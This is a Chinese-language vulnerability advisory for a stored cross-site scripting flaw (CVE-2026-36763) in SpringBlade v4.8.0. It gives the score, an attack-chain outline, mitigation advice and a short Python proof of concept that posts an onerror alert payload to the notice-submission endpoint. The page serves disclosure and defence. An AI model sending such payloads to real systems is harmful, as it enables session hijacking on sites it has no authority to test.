CVE-2026-36763 CVSS 6.1 中危

CVE-2026-36763 SpringBlade存储型XSS漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36763

漏洞类型

存储型跨站脚本 (XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

SpringBlade

漏洞概述

SpringBlade v4.8.0版本存在存储型XSS漏洞。攻击者可利用`/api/blade-desk/notice/submit`接口的`content`参数注入恶意脚本。由于无需认证，恶意代码会被存储并在用户查看公告时执行，导致会话劫持或恶意操作。

技术细节

该漏洞源于SpringBlade在处理公告提交时未对`content`参数进行充分过滤。攻击者构造包含JavaScript代码的POST请求发送至`/api/blade-desk/notice/submit`，服务器将数据存入数据库。当管理员或其他用户访问公告列表时，后端直接输出未转义内容，导致浏览器执行XSS Payload。CVSS向量显示无需用户交互即可触发存储阶段，但需用户交互执行脚本（UI:R），影响机密性和完整性。

攻击链分析

STEP 1

1. 信息收集

识别目标的SpringBlade系统及公告提交接口。

STEP 2

2. 漏洞利用

向`/api/blade-desk/notice/submit`发送包含XSS Payload的POST请求。

STEP 3

3. 载荷持久化

服务器将恶意脚本存储在数据库中。

STEP 4

4. 触发执行

用户访问公告页面，浏览器解析并执行恶意脚本。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

url = "http://target/api/blade-desk/notice/submit"
payload = {
    "content": "<img src=x onerror=alert('XSS')>",
    # other necessary parameters if known, usually title etc.
    "title": "Test Notice"
}
# Send the malicious request
response = requests.post(url, json=payload)
print(response.text)

影响范围

SpringBlade v4.8.0

防御指南

临时缓解措施

在应用网关或WAF层拦截包含常见XSS标签（如<script>, <img onerror>等）的请求流量，并暂时限制公告发布权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表